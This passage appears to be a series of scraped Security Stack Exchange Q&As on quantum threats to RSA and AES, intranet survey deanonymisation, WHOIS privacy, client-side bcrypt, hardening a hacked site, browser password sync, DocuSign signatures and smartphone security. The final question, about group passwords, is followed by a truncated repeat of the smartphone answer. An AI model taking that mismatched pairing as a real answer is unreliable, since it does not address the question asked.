Quantum computing will change the encryption game, but it is not yet clear how much it will change. It's not clear because we are not yet certain what sorts of problems quantum computers can solve. As mentioned, RSA is dramatically weakened by quantum computing because the factoring of primes can be done in polynomial time using Shor's Algorithm. However, not all cryptographic routines are known to be as weak vs. quantum computing. You may have heard of P (polynomial time), NP (nondeterministic polynomial time -- problems that given the right answer can be checked in polynomial time), and NP-Complete (the hardest NP problems). Prime factorization of large composite numbers is known to be an NP problem and is thought by many to not be P problem. That means a conventional computer would most likely¹ need super-polynomial time (at best sub-exponential time like GNFS ) to do the factorization and RSA encryption depends on this. NP-complete is a slightly more demanding class of problem. Any instance of an NP problem can be reduced to an instance of an NP-complete problem. (This is true even if the NP problem is another NP-complete problem.) This means if you ever found a polynomial time solution for an NP-complete problem, you would have a polynomial time solution for every NP problem. If you did so using a classical computer, you would have proven P = NP. Quantum computers have their own complexity class. BQP is the class of problems that can be [statistically] solved by a quantum computer in polynomial time. It is known that factorization is in BQP, because we have Shor's algorithm. What is yet unknown is whether BQP contains NP-complete or not. It is currently theorized that it does not, meaning there are NP-complete problems that still take exponential time, even with a quantum computer, but the mathematicians are still crunching away at that theory. Integer factorization sits in an interesting middle ground. We know it is part of BQP (because we found Shor's algorithm). We also know that it is a problem within NP (it is NP because the factorization can be proven in polynomial time just by multiplying the numbers back together). What we don't yet know is whether it is P, NP-but-not-P, or NP-complete. Nobody has been able to prove it one way or another. It could actually be a P problem, solvable with a classical computer in polynomial time, making it very weak for encryption purposes. It could be a NP-complete problem, which given that we know it is in BQP, would imply that quantum computers can solve any NP problem in polynomial time, which would be a major blow to cryptography in general. Many upcoming encryption algorithms are starting to use other problems besides prime factorization as their root. In particular, a set of problems based on lattices are thought to be particularly hard to break using quantum computers. If all NP problems are part of BQP, this won't help any, but we're still figuring that detail out to this day. As it turns out, AES is not affected by Shor's algorithm. Grover's algorithm allows brute-forcing an n-bit key in O(2 n/2 ) time instead of the O(2 n ) time required by classical computers. Therefore, an 128-bit AES key could be brute forced in O(2 64 ) time by a sufficiently powerful quantum computer that can do Grover's algorithm with 128+ qubits for 2^64 time. ¹ The wise and challenging commenters below are picking away at the imprecision in my wording. Technically it is not known whether NP problems requires exponential time or not. It is possible that the NP class of problems and the P class of problems are the same. However, most mathematicians believe it is much more likely that P != NP, simply because so far it doesn't look like it. If we want to talk in betting terms, just look at how much you could make answering the question. if you prove P and NP are distinct, you can earn the Clay prize of a million dollars, and maybe get a cushy job offer for being so smart. If you prove they are the same, I would expect the NSA to be willing to pay quite a lot more for you to be silent about your discovery, and instead hand over your papers to their mathematicians. If you are very interested in the topic of quantum computing and encryption, I highly recommend reading up on the different complexity classes such as P and NP. They're worth your time.
{ "source": [ "https://security.stackexchange.com/questions/116596", "https://security.stackexchange.com", "https://security.stackexchange.com/users/92894/" ] }
116,694
In the past I have completed an 'anonymous' survey at work only to find that my employer was able to garner a lot of not-anonymous information from this survey. Location, name of manager, etc. None of this information was provided in the survey. This leads me to believe that somehow the website has been able to identify some form of user information. Is there a way that a webpage can read user or other system related information? The site in question has aspx and js elements. I cannot think of any other way they could identify the user. The link doesn't appear unique. Browser is IE, environment is Win7 on Citrix.
If the site is based on ASPX files, then it is more than likely that this is a ASP.NET application - most probably hosted on IIS. IIS has a very simple checkbox to enable Windows Integrated Authentication. IE, on Windows 7, will by default send your credentials to any web server in the local intranet. (This is not your password, don't worry, but it is Windows based authentication - either Kerberos or NTLM). This is very straightforward to associate your Windows Domain account with your survey answers...
{ "source": [ "https://security.stackexchange.com/questions/116694", "https://security.stackexchange.com", "https://security.stackexchange.com/users/103643/" ] }
116,700
As above - if I register a domain name, will my postal address become "googleable" via WHOIS by someone that doesn't know what the domain name is? (Say I have a fairly distinctive first and last name)
Yes. There are numerous web sites which present 'whois' information, and they are indexed by Google. For example, this search: "Chen, William" whois Leads to results like this: MazdaMedia.com WHOIS, DNS, & Domain Info - DomainTools Which contain the full WHOIS record as well as other information. Of course, most registrars offer "private registration" services (for a fee, of course) where the details they release are anonymized - instead of your email, they generate a random email address and forward all mail for that address to you, and your name is redacted. Here's an example of a domain that's protected in this manner: Play4kd.com WHOIS, DNS, & Domain Info - DomainTools Registry Registrant ID: Registrant Name: WHOISGUARD PROTECTED Registrant Organization: WHOISGUARD, INC. Registrant Street: P.O. BOX 0823-03411 Registrant City: PANAMA Registrant State/Province: PANAMA Registrant Postal Code: 00000 Registrant Country: PA Registrant Phone: +507.8365503 Registrant Phone Ext: Registrant Fax: +51.17057182 Registrant Fax Ext: Registrant Email: [email protected] (If you are reading this after February, 2017, there's no guarantee the link will continue to reflect this protection ).
{ "source": [ "https://security.stackexchange.com/questions/116700", "https://security.stackexchange.com", "https://security.stackexchange.com/users/103656/" ] }
116,738
Let's say that I have a system where one of the security requirements is preventing users from choosing a password that matches their username. Usernames are not case sensitive but the passwords are. The passwords are stored by the server using a secure hashing function that cannot be reversed. When the account is created both the username and password are initially available in plaintext to the server for comparison. We can compare them in memory (while disregarding case) to see if they match and instruct the user to choose a different password if they do. Once this check is satisfied the password is securely hashed for storage while the username is stored in plaintext. No problems meeting the requirement here. When the user wants to change their password, or it is being changed for them, the server can retrieve their username record and compare it to the newly chosen password value (again ignoring case) to see if it matches. No problems meeting the requirement here either. However, the system also allows username changes. During this ID change process the user hasn't necessarily provided their password in plaintext to the server. They may have done so when they authenticated, but the server isn't going to keep that password stored in plaintext just in case they decide to change their username. So the plaintext password is not available to check for a match against the newly chosen username value. In an attempt to meet our requirement the server can use the same secure hashing function to hash the new username and compare it to the recorded hashed password. If they match then the server can instruct the user to choose a different username. However, since the username is not case sensitive this check might fail when it is arguably true. If I submit "PwdRsch1" as a new username choice and my password is "pwdrsch1" then the system will allow it since the hashes won't match. I -- or worse, an attacker -- could then later successfully authenticate with a matching username and password of "pwdrsch1". We could force the username to lowercase before hashing and checking it against the password, but then the reverse scenario is possible. The username would be checked as "pwdrsch1" against a password of "PwdRsch1" and allowed since these don't match. But later I can successfully authenticate with a matching username and password of "PwdRsch1". What reasonable options do I have to reduce this risk of a password matching a username that is not case sensitive?
The only sensible way to get what you want is to ask for the password when a user changes their username. This way the server always has the information needed to conduct an accurate comparison between the username and password during a change, and prevent matches. As sensitive operations - such as changing passwords, or in your case usernames - should require a password anyways (to limit the damage of XSS), this shouldn't be a problem. Your only other alternative is to try every possible case combination, hash it, and compare that to the stored hash when a user changes their username.
{ "source": [ "https://security.stackexchange.com/questions/116738", "https://security.stackexchange.com", "https://security.stackexchange.com/users/45733/" ] }
116,835
I’m developing an Android app with a MySQL database for storing user login credentials. I’m using jBCrypt for hashing passwords before storing them in the database. On registration, the password is hashed on client-side as follows: String salt = BCrypt.gensalt(); String hash = BCrypt.hashpw("password", salt).split("\\$")[3]; salt = salt.split("\\$")[3]; hash = hash.substring(salt.length(), hash.length()); In this case, BCrypt.hashpw() will give me the hash $2a$10$rrll.6qqZFLPe8.usJj.je0MayttjWiUuw/x3ubsHCivFsPIKsPgq I then remove the params ( $2a$10$ ) and store the first 22 characters as salt and the last 31 as hash in the database: ------------------------------------------------------------------------ | uid | salt | hash | ------------------------------------------------------------------------ | 1 | rrll.6qqZFLPe8.usJj.je | 0MayttjWiUuw/x3ubsHCivFsPIKsPgq | ------------------------------------------------------------------------ Now, whenever a client wants to log in, they enter their username and password and only the salt is returned from the database. The client calculates their hash by calling BCrypt.hashpw() with their salt: String salt = "$2a$10$" + returnedSalt; String hash = BCrypt.hashpw(“password”, salt).split("\\$")[3]; hash = hash.substring(salt.length(), hash.length()); giving me: hash = "0MayttjWiUuw/x3ubsHCivFsPIKsPgq" which is equal to the hash stored in the database. The client then sends the username and the calculated hash back to the server. If they match, the user gets logged in. I know that I can simplify this process by fetching the entire BCrypt hash directly and compare it with the given password with if (BCrypt.checkpw(“password”, bCryptHash)) // match but it feels wrong to send the entire hashed password to the user to perform the check. I understand that it is preferable to hash the passwords server-side, but is there something wrong with this solution? Am I missing something? Say that I have an unencrypted HTTP connection between the phone and the server. Would this be a secure solution?
The client is the attacker. Walk around your office while chanting that sentence 144 times; be sure to punctuate your diction with a small drum. That way, you will remember it. In your server, you are sending Java code to run on the client. The honest client will run your code. Nobody forces the attacker to do so as well; and you use client authentication precisely because you fear that the client maybe be somebody else, who tries to impersonate the normal user. From your server point of view, you only see the bytes that you send to the client, and the bytes that come back. You cannot make sure that these bytes were computed with your code. The attacker, being an evil scoundrel, is perfectly able to envision not running your code and instead send the answer that your server expects. Consider now a simple password authentication scheme where you simply store the users' passwords in your database. To authenticate, ask the user to send the password, and then compare it with what you stored. This is very simple. This is also very bad: it is called plaintext passwords . The problem is that any simple read-only glimpse at the database (be it a SQL injection attack, a stolen backup tape, a retrieved old harddisk from a dumpster...) will give the attacker all the passwords. To state things plainly, the mistake here is in storing in the database exactly the values that, when sent from the client, grant access. And your proposed scheme ? Exact same thing. You store in the database the hash value "as is". And when the client sends that exact value, access is granted. Of course, the honest client will send the value by hashing a password. But, let's face it: many attackers are not honest people. Now there is value in doing part of the hashing on the client side. Indeed, good password hashing is an arms race, in which the hashing is done expensive on purpose. Offloading some of the work on clients can be a nice thing. It does not work as well when clients are feeble, e.g. smartphones with Java, or, even worse, Javascript (which is a completely different thing, despite the name similarity). In that case, you would need to run bcrypt on the client, and store on the server not the bcrypt output, but the hash of the bcrypt output with some reasonable hash function (a fast one like SHA-256 would be fine). The processing of a password P would then be a bcrypt on the client, then a SHA-256 of the result, computed on the server. This will push most of the CPU expense on the client, and will be as secure as a raw bcrypt for what it is meant to do (see below). I understand that you want to "encrypt" passwords (hashing is not encryption !) because you want to use plain HTTP. You do not like HTTPS for the same reason as everybody else, which is the dreaded SSL certificate. Paying 20 bucks a year for a SSL certificate would be akin to having your skin removed with a potato-peeler sprinkled with lemon juice. Unfortunately, there is no escaping the peeler. As others have remarked, even if you have a rock solid authentication mechanism, raw HTTP is still unprotected and an active attacker can simply wait for a user to authenticate, and hijack the connection from that point. A very common example of "active attacker" are people who simply run a fake WiFi access point -- that is, a completely real WiFi access point, but they also keep the option to hijack connections at any point. This is a kind of attack model that cannot be countered without a comprehensive cryptographic protocol that extends over all the data, not just an initial authentication method. About the simplest kind of such protocol is SSL/TLS. Any protocol that provides the same guarantees, that you absolutely need, will also be as complex as SSL/TLS, and much harder to implement because, contrary to SSL/TLS, it is not already implemented in the client software. SSL is there, just use it. As for the lemon, suck it up. (If the financial cost is a barrier, there are free alternatives, such as Let's Encrypt and pki.io . Whether they fit your bill remains to be seen, but they are worth considering if you are really short on cash.)
{ "source": [ "https://security.stackexchange.com/questions/116835", "https://security.stackexchange.com", "https://security.stackexchange.com/users/103807/" ] }
116,877
(While the answers and comments at How do I deal with a compromised server? are useful, my question is more about prevention of hacking when I do not have total (or much) control over the server. I have SSH access but not root privileges. I cannot see or change anything beyond my own user account.) I volunteer for a non-profit, maintaining their web site for them. We've been on a low-budget shared hosting platform (Bluehost) for several years. The site was built on Wordpress and I did my best to keep core WP and all plugins up to date. But we got hacked multiple times. Sometimes it was malicious (defacing the home page) while other times it was stealth (I discovered hidden files that seemed to just allow someone to get in and snoop around). I totally got rid of WP, rebuilding the site on Bootstrap. I removed all files from the server, ran multiple virus scans on the local version of the new site, grep'd for anything that would be suspicious, and then uploaded the files to the server. I was nearly 100% sure this new codebase was "clean". But within a few days, I discovered (by comparing the server to my local version) a hacked index.php (some 'preg-replace' code was inserted before the first line) and found a "logo-small.png" file in a subdirectory that was not really an image file. It was a big hunk of obfuscated PHP that looked set to to nasty things (I de-obfuscated and viewed the code). I knew that shared hosts, often with hundreds of sites, could be vulnerable. At this point, I totally distrust the server we're on. But when I asked Bluehost if we'd be safer on a VPS or dedicated server (thinking our "sandbox" would be harder to get into), they said it wouldn't really make a difference. So I'm in a quandary. The non-profit I help out has limited budget. But I also don't want to continue spending tens to hundreds of hours monitoring and fixing the site. I don't know if hackers are getting in via the file system or an open port that shouldn't be open. Is there a cost-effective solution that provides much better "hardening"?
If the only thing you expose to internet are non-interactive web pages and do not need to run server-side components, then you can substantially lower your risks by using a static web site . You are then left with the web engine itself and to some extend the underlying OS. Apache or nginx are not simple to harden so you could have a look at Cherokee or publicfile . You can go one step further by either hosting your static files on an existing environment which accepts them ( Github Pages for instance) or move to a site you build with blocks like Google Sites (which are free for non-profit organizations).
{ "source": [ "https://security.stackexchange.com/questions/116877", "https://security.stackexchange.com", "https://security.stackexchange.com/users/52415/" ] }
116,881
I wonder, how wise is it to allow Chrome and Firefox to a) remember the passwords b) synchronize them? My gut tells me that if it's not man in the middle who can intercept them, but Google and Mozilla themselves can see them on their servers or with help of their browsers. Of course, they say they won't and the passwords are stored encrypted, but can we know that for sure? Maybe the browsers themselves secretly send the passwords to Google and Mozilla. I've just begun using keepass recently, therefore at least I have a place where my passwords are stored locally, because previously I stored them only in the browsers and synchronized. And now I think I shouldn't synchronize them anymore.
To expand on what @d1str0 said: if the creator of your browser wanted to steal your passwords, it would be trivial to send them to a manufacturer controlled server whenever you entered them - they don't need to bother with the hassle of telling you about sync procedures, or offering to remember passwords. All browsers by default send a certain level of usage data back, usually crash reports and update checks, which could easily conceal password and username data. However, if any browser was found to be doing this, there would be outcry against that manufacturer - look at the rage directed at Microsoft following the release of Windows 10 with the reporting back enabled there. Keepass and Password Safe are both open source (so, given sufficient programming knowledge, and a trusted compiler, you can be sure they're doing what they say they are, and nothing else - sufficient programming knowledge may well be a very high level though). In both cases, the encrypted password files should be safe to sync, even to third party sources, as long as the safe password is not provided. Breaking AES (Keepass) or TwoFish (Password Safe) without the appropriate key (the safe password) comes down, as far as we know, to brute force. Lastpass and 1Password both require you to trust the developers, and sync by default to a remote location. Theoretically, they are safe, but there wouldn't be any obvious way to detect a vulnerability in them relating to storage. If you're concerned about Chrome or Firefox stealing passwords, logically, the same arguments apply to these apps. Personally, I use one of the cloud based password services mentioned - I've considered the risks and benefits, and balanced the amount of security I'm willing to accept against the ease of use for the service, and decided that for my use cases, it's acceptable. Your acceptable risk might well be different - if you consider AES as vulnerable, for example, keeping a Keepass safe on an encrypted USB key which uses a different encryption algorithm might be a viable option, but uploading the file to a third party service might be "too risky" for you. It comes down to what you consider safe, having evaluated the options. Many security professionals have considered this problem though, and generally advise using password safe type software over allowing browsers to remember passwords, simply because browsers used to be terrible at it - they allowed access without a master password, and used poor encryption methods. Some of these issues have been addressed now, but old habits die hard!
{ "source": [ "https://security.stackexchange.com/questions/116881", "https://security.stackexchange.com", "https://security.stackexchange.com/users/32926/" ] }
116,896
I've never been happy with the explanation DocuSign gives for themselves in their own marketing material (e.g. https://www.docusign.com/how-it-works/electronic-signature/digital-signature/digital-signature-faq , https://www.docusign.com/products/electronic-signature and https://www.docusign.com/how-it-works/security ). I have a number of questions: For me, if I want a document to be signed, I need to encrypt the hash of the document with my private key, and any recipients can verify the signature by decrypting my signature's hash and comparing it with their own recompute of the hash. On DocuSign I cannot see where or how I can provide my own private key (which would be a huge security issue in itself) nor will it let me keep my private key private (i.e. on my premises, not uploaded to their server). There is also no mention of any public key - in fact there's no way for me to verify the integrity and authorship of any document as DocuSign simply doesn't give that type of metadata to me, I just have to take their word for it that the document hasn't been tampered with. How does DocuSign verify identity in a meaningful way? So far all I can tell is that they can verify email address ownership (or at least mailbox access ), I don't remember ever being required to verify my identity by driving license or passport scan uploads - so how is that legally considered proof-of-identity? How is it a signature in any way if it cannot provably be linked with my real-life identity? Anyone could claim one of my expired Hotmail addresses and create a DocuSign account for me and sign things with it. I have a problem with DocuSign being simultaneously 1) the verifier of identity, 2) the holder of the documents, and 3) the generator of the signatures - the fact it's a single legal entity means they have the legal, and certainly the technical, means of altering any document, its signature, and claims about that signature; considering recent news events where certain first-world nations governments try to coerce companies to decrypt their data this means I'm not likely to consider DocuSign trustworthy enough to "sign" anything significant. There is also the fact that DocuSign's codebase is proprietary and not accessible - I have to take their word (on their homepage, no less) that they have been independently audited and that the audit means something. I also don't like how they generate a fake handwritten "signature" image - I thought it has been established that simply having a photo of anyone's handwriting next to some text does not constitute a signature. I'm concerned of the effect this may have on users: a kind of " CSI effect " where the crypto-layperson will think that a picture of their signature is enough and then apply this learned "fact" to other platforms, thus worsening the public's awareness of PKI (after all the progress we've made educating users about SSL). Given the problems I think found in DocuSign above - if I were involved in a legal case, such as a contractual dispute, and the version on DocuSign is brought as evidence - can either party in the suit legitimately claim that the DocuSign document is bona-fide, conversely how easily could the other party show the "signature" cannot be trusted? i.e. can anyone sum-up DocuSign's service and categorically say if it's cryptographically, or at least legally, sound?
A signature is, ultimately, a legal concept. When you sign a document, you are really producing a legal gun aimed at your own head (so you usually want other people to sign things, not sign them yourself). The value of a signature comes from its legal power, i.e. how much it will allow to apply responsibility and blame on the signer. The cryptographic elements (RSA and so on) are only tools that can help build the technical side of things, but that cannot suffice. Ultimately, there must be some kind of legal framework that defines signatures. Of course, this will depend on jurisdiction. Nevertheless, countries/states that are currently defining laws for electronic signatures tend to go along the same lines: A signature is binding as long as it was really signed by the alleged signer. This looks tautological, but it is an important definition: it really says that the signature legal value is not intrinsic to any specific technology. Writing your name at the end of an email is a signature. What matters is the burden of proof . Legal frameworks will normally segregate systems into two categories: those for which signatures are reputed good, and it is the party who denies having signed who must make all the proofing work; and those for which signatures are reputed worthless unless a positive proof of attribution to the alleged signer is shown. "Name at the end of an email" belongs to the latter category; a positive proof may be simply a witness who saw the signer type the email. The reference for signatures is handwritten signatures, which are, technically speaking, absolutely terrible. They are hard to validate, and can be faked. Handwritten signatures are still used thanks to a legal framework that severely punishes anybody who denies his own signature. Since handwritten signatures occur in the physical world, the very act of signing (with a pen) leaves a lot of traces (witnesses and so on) so many people ultimately find that repudiating their own signatures is too risky. A further complication is that legal systems of the "Common Law" tradition tend to rely on jurisprudence to iron out the fine details, so countries like USA and UK will likely have legal frameworks for signatures that boil down to "wait and see" ("see you in court", I mean). In France (which has a very "Latin" law system that really likes pre-established rigorous definitions, Descartes-style), the legal framework defines systems which are qualifiés , by which they mean that they went through independent audits and an administrative process that has all the simplicity that can be expected from French bureaucracy, to the effect that for this systems, the burden of proof lies on whoever claims that the signature is not binding. The list of the systèmes qualifiés is published and I see no DocuSign there [edit - as of July 21, 2017, DocuSign France is now listed]. DocuSign has a page dedicated to the legality side of things -- which is in fact a lot more important than the technology. In particular, they say this: While DocuSign has a successful history of providing customers with all the evidence they need to defend their documents against repudiation, DocuSign is available to assist our customers with legal challenges by testifying in court to support the validity of DocuSigned documents. which implicitly admits that their system tends to be of the "must prove validity" kind, i.e. not the one you would like -- but they claim to have had good results in some courts, and that they will help you. At that point, I'd say that if you want to use DocuSign for making your customers / business partners sign things, you'd better make sure that there are appropriate clauses in your contract that ensure a strong level of help from DocuSign, with insurance and so on. Your lawyer team should be involved.
{ "source": [ "https://security.stackexchange.com/questions/116896", "https://security.stackexchange.com", "https://security.stackexchange.com/users/69237/" ] }
117,009
I'm looking at replacing my very old android smartphone. Information security is increasingly a feature that I'm looking for. As well as being slow, I don't think I can upgrade my current handset to the latest android versions or even the latest version of the mobile security app I use, so almost anything would likely be an improvement. Ideally I'm looking for a handset or ROM which has security (ideally encrypting data in communication and at rest) as a priority and will likely still be secure (with updates) in several years' time. I'd prefer an android solution, unless security on other platforms is significantly better/easier to achieve. Is the choice of handset a significant consideration, or is security mainly down to the way it is used - regular updates, careful checking of apps before installation? PLEASE NOTE : I am not looking for a specific recommendation , but rather guidance in knowing what to look for . Feel free to pop recommendations in the comments - but NOT the answers.
TLDR: There are several categories of security you must consider when looking for a phone. The main advice, though, is to get a newer phone with the latest security features, and from a manufacturer that has a good reputation of providing updates. Security against other people (peers, police/government) Look for newer devices with full disk encryption, and at the very least have a code or fingerprint required to unlock your device. Both Android and iOS have the ability to encrypt the phone. When booting the phone, the password must be provided to finish booting and to view files. Upside: Your phone is protected from external attempts to read the data Downside: You must type in your password/PIN every time you boot, and usually every time you unlock your screen. As this is built-in to more recent versions of Android and iOS, you must slightly narrow your search to exclude older phones that don't have this capability. Encryption key vs unlock code As a usability/security tradeoff, I prefer to have a long password required on boot, but have a simpler code to unlock the screen. Apple does this natively, letting you set a PIN or password required on boot, but thereafter letting you unlock the phone with your fingerprint . Upside: You can use a complex password, while keeping the ease of unlocking your phone quickly. Upside: A shoulder-surfer can't unlock your phone, since your fingerprint unlocks it. They would have to catch you as you type in the password on boot. (When you type your password, be sure no one is watching!) Downside: Your fingerprint is not protected by law (in the U.S.). The police can force you to unlock the phone with your fingerprint. Whereas a password or code, something you know, cannot be forced out of you. Even if a court orders you and holds you in contempt for failing to provide the unlock code, they cannot access your data without your cooperation. On a rooted Android device, you can install a mod that lets you have a complex boot password and a simpler PIN for the screen unlock. If you enter the PIN incorrectly, it requires the strong password to be entered, which prevents brute-force attempts at the much simpler PIN. You are losing some security, however, since anyone shoulder-surfing could see you put in your PIN and later steal the phone for unlocking. Upside: You can use a complex password, while keeping the ease of unlocking your phone quickly. Upside: Only your knowledge can unlock the device. Downside: You must enter a PIN every time you unlock the screen. As this happens frequently, it is much more likely that someone could find out your simple unlock combination. Security against apps Check app permissions before installing, and make sure you get a newer phone that has extra permission management. Apple/iOS Apple devices (excluding jailbroken ones) can only install apps that have gone through Apple's vetting process. While this isn't 100% successful, it does protect most users from installing a malicious app. On top of that, certain obvious privacy features, such as GPS location and contact info, require an extra user prompt to allow an app to access that information. Android 6.0+ Android permission settings before 6.0 Marshmallow were all-or-nothing. If an app requested permissions to your GPS, you either allowed it or didn't install the app. Android 6.0 introduces similar features to iOS that let the user deny certain permissions while still installing the app. If looking at Android devices, this narrows the eligible devices, excluding phones that don't have Android 6.0 or newer. Android 4.x-5.x with XPrivacy However, if the Android device has root and can install the Xposed framework, you can install XPrivacy . That app overhauls the permission model on Android so that nearly every possible privacy-related permission can be allowed or denied in real time. If the app tries to use GPS, it prompts you to allow or deny (or provide fake/null information). This is available to most rootable Android devices running any version of Android 4.0 to 5.0. Look for a phone that can be rooted if you want extreme privacy permission tweaking. Security against bugs/exploits Look for phones made by manufacturers with a history of regular updates. Most iOS and Android updates include bug fixes along with new features. As long as the iOS device is supported, they can all get the update at the same time when it is released. On Android, Nexus devices are generally the first to receive updates. For other manufacturers, make sure they have a history of providing updates to older phones and within a reasonable timeframe. Alternatively, find an Android phone with an unlocked bootloader and an active development community. While more technical, this can be the fastest way to get the latest updates, even after a manufacturer has stopped supporting the phone. Security against the device manufacturer Buy devices from a trusted manufacturer, and make sure it uses full-disk encryption where the manufacturer does not hold the key. Also, for Android, consider a device with an unlockable bootloader to be able to load custom ROMs with newer security updates and better privacy features built-in. Apple devices cannot be unlocked even by Apple starting in iOS 8. While it may be possible in theory for Apple to provide an update that subverts this, currently it is impossible for Apple to unlock your phone or gain access to the encrypted partition on your phone . If you have iCloud Backup enabled, however, that data can be accessed by Apple . Similarly, Android devices with Full Disk Encryption enabled cannot be unlocked by the manufacturer, or even Google. Unlocked bootloader With Android devices, an unlocked bootloader lets you install custom ROMs, or even make your own built from scratch using the Android OS source code. If your phone is no longer supported by the manufacturer, you can still update to the latest version of Android, assuming someone has compiled a Rom for your device. Some Android ROMs have additional security and privacy controls built-in. Warning: This can be detrimental to security. Make sure to use a Rom that is widely known and trusted. Security in the cloud Use a cloud storage provider that encrypts your data and does not have access to the unlock key. Almost all cloud storage (Dropbox, iCloud, etc) store files in a non-encrypted way, or in a way that the cloud provider could decrypt the files without the user's permission. The primary way to protect against this is to not use cloud storage. If you need to back up your files, use your own encrypted server or manually copy files onto an encrypted desktop computer. A few storage providers, such as MEGA and SpiderOak , do encrypt your files. The encryption key is not accessible to them, and a government entity would have to coerce them to write an update to their software in order to acquire the unlock key from a user. Android and Apple both have apps for MEGA that work similarly to Dropbox, including automatically saving photos taken by the phone. Security against networks Make sure your phone can use VPN software, and possibly use TOR to increase privacy. And be sure to browse the web with https when possible. The internet service provider can view all of your unencrypted network traffic. To help avoid this, use a VPN. Note: the VPN can see your unencrypted data as well. Use a trusted VPN provider. The ISP can even determine some information from encrypted network traffic, if you aren't using a VPN. If you open a web page that uses https, the ISP can see which domain you are going to. They cannot, however, see the specific page you are requesting, nor the data of the page itself. If extreme privacy is a need, Tor may be the answer. It has plenty of downsides, the primary being slow speed (compared to normal browsing). But when using Tor, your ISP cannot see your network information, aside from the fact that you're using Tor. And the nodes on Tor are unable to know both the source (you) and destination (the website) due to the way the protocol is designed.
{ "source": [ "https://security.stackexchange.com/questions/117009", "https://security.stackexchange.com", "https://security.stackexchange.com/users/34123/" ] }
117,013
I am developing a tool for a company, that takes some technical data and creates PDF reports. In the tool you have several text fields, which get filled by the database. If the user wants to, he can change the contents of the textfields. In the end, he presses a button and some reports get created, archived and send to the customer. My boss made the proposal to just use a group password for everyone, so every user of the tool knows the password and simply has to enter his own username. I refrained from this and told him, this would be convenient, but unsafe mainly for the reason of Identity theft: someone can simply enter another username than his and input the textfields with nonsense, that gets send to the customer, print a report 300 times, create the report 500 times, etc. We discussed this a little bit further and after he realised, that an attacker indeed could do some damage, at least to the reputation, we tried to find a scenario, where such a group password would be acceptable. This got me curious: are there environments or situations, where such a group password would be acceptable? Or will it always get shot down with the "identity theft"-argument?
TLDR: There are several categories of security you must consider when looking for a phone. The main advice, though, is to get a newer phone with the latest security features, and from a manufacturer that has a good reputation of providing updates. Security against other people (peers, police/government) Look for newer devices with full disk encryption, and at the very least have a code or fingerprint required to unlock your device. Both Android and iOS have the ability to encrypt the phone. When booting the phone, the password must be provided to finish booting and to view files. Upside: Your phone is protected from external attempts to read the data Downside: You must type in your password/PIN every time you boot, and usually every time you unlock your screen. As this is built-in to more recent versions of Android and iOS, you must slightly narrow your search to exclude older phones that don't have this capability. Encryption key vs unlock code As a usability/security tradeoff, I prefer to have a long password required on boot, but have a simpler code to unlock the screen. Apple does this natively, letting you set a PIN or password required on boot, but thereafter letting you unlock the phone with your fingerprint . Upside: You can use a complex password, while keeping the ease of unlocking your phone quickly. Upside: A shoulder-surfer can't unlock your phone, since your fingerprint unlocks it. They would have to catch you as you type in the password on boot. (When you type your password, be sure no one is watching!) Downside: Your fingerprint is not protected by law (in the U.S.). The police can force you to unlock the phone with your fingerprint. Whereas a password or code, something you know, cannot be forced out of you. Even if a court orders you and holds you in contempt for failing to provide the unlock code, they cannot access your data without your cooperation. On a rooted Android device, you can install a mod that lets you have a complex boot password and a simpler PIN for the screen unlock. If you enter the PIN incorrectly, it requires the strong password to be entered, which prevents brute-force attempts at the much simpler PIN. You are losing some security, however, since anyone shoulder-surfing could see you put in your PIN and later steal the phone for unlocking. Upside: You can use a complex password, while keeping the ease of unlocking your phone quickly. Upside: Only your knowledge can unlock the device. Downside: You must enter a PIN every time you unlock the screen. As this happens frequently, it is much more likely that someone could find out your simple unlock combination. Security against apps Check app permissions before installing, and make sure you get a newer phone that has extra permission management. Apple/iOS Apple devices (excluding jailbroken ones) can only install apps that have gone through Apple's vetting process. While this isn't 100% successful, it does protect most users from installing a malicious app. On top of that, certain obvious privacy features, such as GPS location and contact info, require an extra user prompt to allow an app to access that information. Android 6.0+ Android permission settings before 6.0 Marshmallow were all-or-nothing. If an app requested permissions to your GPS, you either allowed it or didn't install the app. Android 6.0 introduces similar features to iOS that let the user deny certain permissions while still installing the app. If looking at Android devices, this narrows the eligible devices, excluding phones that don't have Android 6.0 or newer. Android 4.x-5.x with XPrivacy However, if the Android device has root and can install the Xposed framework, you can install XPrivacy . That app overhauls the permission model on Android so that nearly every possible privacy-related permission can be allowed or denied in real time. If the app tries to use GPS, it prompts you to allow or deny (or provide fake/null information). This is available to most rootable Android devices running any version of Android 4.0 to 5.0. Look for a phone that can be rooted if you want extreme privacy permission tweaking. Security against bugs/exploits Look for phones made by manufacturers with a history of regular updates. Most iOS and Android updates include bug fixes along with new features. As long as the iOS device is supported, they can all get the update at the same time when it is released. On Android, Nexus devices are generally the first to receive updates. For other manufacturers, make sure they have a history of providing updates to older phones and within a reasonable timeframe. Alternatively, find an Android phone with an unlocked bootloader and an active development community. While more technical, this can be the fastest way to get the latest updates, even after a manufacturer has stopped supporting the phone. Security against the device manufacturer Buy devices from a trusted manufacturer, and make sure it uses full-disk encryption where the manufacturer does not hold the key. Also, for Android, consider a device with an unlockable bootloader to be able to load custom ROMs with newer security updates and better privacy features built-in. Apple devices cannot be unlocked even by Apple starting in iOS 8. While it may be possible in theory for Apple to provide an update that subverts this, currently it is impossible for Apple to unlock your phone or gain access to the encrypted partition on your phone . If you have iCloud Backup enabled, however, that data can be accessed by Apple . Similarly, Android devices with Full Disk Encryption enabled cannot be unlocked by the manufacturer, or even Google. Unlocked bootloader With Android devices, an unlocked bootloader lets you install custom ROMs, or even make your own built from scratch using the Android OS source code. If your phone is no longer supported by the manufacturer, you can still update to the latest version of Android, assuming someone has compiled a Rom for your device. Some Android ROMs have additional security and privacy controls built-in. Warning: This can be detrimental to security. Make sure to use a Rom that is widely known and trusted. Security in the cloud Use a cloud storage provider that encrypts your data and does not have access to the unlock key. Almost all cloud storage (Dropbox, iCloud, etc) store files in a non-encrypted way, or in a way that the cloud provider could decrypt the files without the user's permission. The primary way to protect against this is to not use cloud storage. If you need to back up your files, use your own encrypted server or manually copy files onto an encrypted desktop computer. A few storage providers, such as MEGA and SpiderOak , do encrypt your files. The encryption key is not accessible to them, and a government entity would have to coerce them to write an update to their software in order to acquire the unlock key from a user. Android and Apple both have apps for MEGA that work similarly to Dropbox, including automatically saving photos taken by the phone. Security against networks Make sure your phone can use VPN software, and possibly use TOR to increase privacy. And be sure to browse the web with https when possible. The internet service provider can view all of your unencrypted network traffic. To help avoid this, use a VPN. Note: the VPN can see your unencrypted data as well. Use a trusted VPN provider. The ISP can even determine some information from encrypted network traffic, if you aren't using a VPN. If you open a web page that uses https, the ISP can see which domain you are going to. They cannot, however, see the 